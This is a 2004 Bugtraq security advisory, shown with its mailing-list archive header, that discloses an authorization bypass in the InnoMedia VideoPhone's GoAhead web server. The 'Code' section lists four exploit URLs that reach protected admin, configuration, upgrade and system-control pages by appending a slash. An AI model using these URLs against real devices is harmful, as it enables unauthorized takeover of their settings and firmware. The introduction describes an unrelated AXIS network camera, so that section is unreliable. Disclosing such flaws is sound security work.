[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000501c3fdf6$478b9ce0$0b3016ac@fucku>
Date: Sat, 28 Feb 2004 14:27:49 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "SecurITeam News" <news@...uriteam.com>,
"securitytracker" <bugs@...uritytracker.com>
Subject: InnoMedia VideoPhone Authorization Bypass
#######################################################################
Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
GoAhead Ltd
http://www.innomedia.com/
http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bugs
3) The Code
#######################################################################
===============
1) Introduction
===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming
video
from anywhere on your network. It lets you keep a close eye on the world
around
you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network
camera
can operate as a standalone or be placed wherever there is a LAN or Internet
connection,
or an available modem.
#######################################################################
======
2) Bug
======
Browsing the server normally
http://<host>/
Will show some info about the server.
The server's menu appears on the left side and contains a few links
to protected files, which setup the server's settings/configuration.
When refering to any of the menu's "protected" links, such as:
http://<host>/videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a
folder.
http://<host>/videophone_admindetail.asp/
#######################################################################
===========
3) The Code
===========
http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
Powered by blists - more mailing lists